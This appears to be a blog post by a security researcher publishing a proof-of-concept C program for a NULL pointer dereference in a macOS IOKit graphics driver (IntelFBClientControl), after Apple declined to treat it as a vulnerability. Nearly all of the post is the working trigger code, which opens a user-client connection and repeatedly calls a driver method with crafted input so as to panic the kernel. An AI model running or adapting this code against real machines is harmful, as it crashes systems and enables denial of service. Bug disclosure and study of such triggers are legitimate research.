NULL Pointer Reference Bug in AppleGraphicsDeviceControl Module

Apple didn’t take NULL Pointer Reference type bug as vulnerability any more.

They reply me with the email something like this:

it does not cross any security boundary because the NULL page
cannot be mapped on the OS. Therefore, will not issue any updates
or CVEs for it.

 

I just public it here for fun. Please don’t do it for any malicious/business purposes.

 

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <IOKit/IOKitLib.h>

void trigger(io_connect_t conn, uint32_t value)

{

    uint64_t INPUTSCALAR[8];

    uint32_t INPUTSCALARCNT = 0;

    

    char INPUTSTRUCT[4096];

    size_t INPUTSTRUCTCNT = 0X1000;

    

    uint64_t OUTPUTSCALAR[8] = {0};

    uint32_t OUTPUTSCALARCNT = 0;

    

    char OUTPUTSTRUCT[4096];

    size_t OUTPUTSTRUCTCNT = 0X1000;

    

    //FILL INPUT

    for (int i=0; i<1024; i++) {

        INPUTSCALAR[0] = value;

        INPUTSCALARCNT = 1;

        

        OUTPUTSCALARCNT = 1;

        INPUTSTRUCTCNT = 29;

        OUTPUTSTRUCTCNT = 0;

        

        printf(“i=%d\n”, i);

        *(uint32_t*)INPUTSTRUCT = i;

        *(uint32_t*)&INPUTSTRUCT[4] = 1;

        

        IOConnectCallMethod(

                            conn,

                            0x4108,

                            INPUTSCALAR,

                            INPUTSCALARCNT,

                            INPUTSTRUCT,

                            INPUTSTRUCTCNT,

                            OUTPUTSCALAR,

                            &OUTPUTSCALARCNT,

                            OUTPUTSTRUCT,

                            &OUTPUTSTRUCTCNT);

    }

}

int main(){

    

    kern_return_t err;

    

    CFMutableDictionaryRef Matching = IOServiceMatching(“IntelFBClientControl”);

    

    if(!Matching){

        

        printf(“UNABLE TO CREATE SERVICE MATCHING DICTIONARY\n”);

        

        return 0;

        

    }

    

    io_iterator_t iterator;

    

    err = IOServiceGetMatchingServices(kIOMasterPortDefault, Matching, &iterator);

    

    if (err != KERN_SUCCESS){

        

        printf(“NO MATCHES\n”);

        return 0;

    }

    

    io_service_t service = IOIteratorNext(iterator);

    

    if (service == IO_OBJECT_NULL){

        

        printf(“UNABLE TO FIND SERVICE\n”);

        

        return 0;

        

    }

    

    io_connect_t CONN = MACH_PORT_NULL;

    

    err = IOServiceOpen(service, mach_task_self(), 2, &CONN);

    

    if (err != KERN_SUCCESS){

        

        printf(“UNABLE TO GET USER CLIENT CONNECTION\n”);

        

        return 0;

        

    }else{

        

        printf(“GOT USERCLIENT CONNECTION: %X, TYPE:%D\n”, CONN, 0);

        

    }

    

    trigger(CONN, 0x4118);

    

    printf(“PANIC?\n”);

    

    return 0;

    

}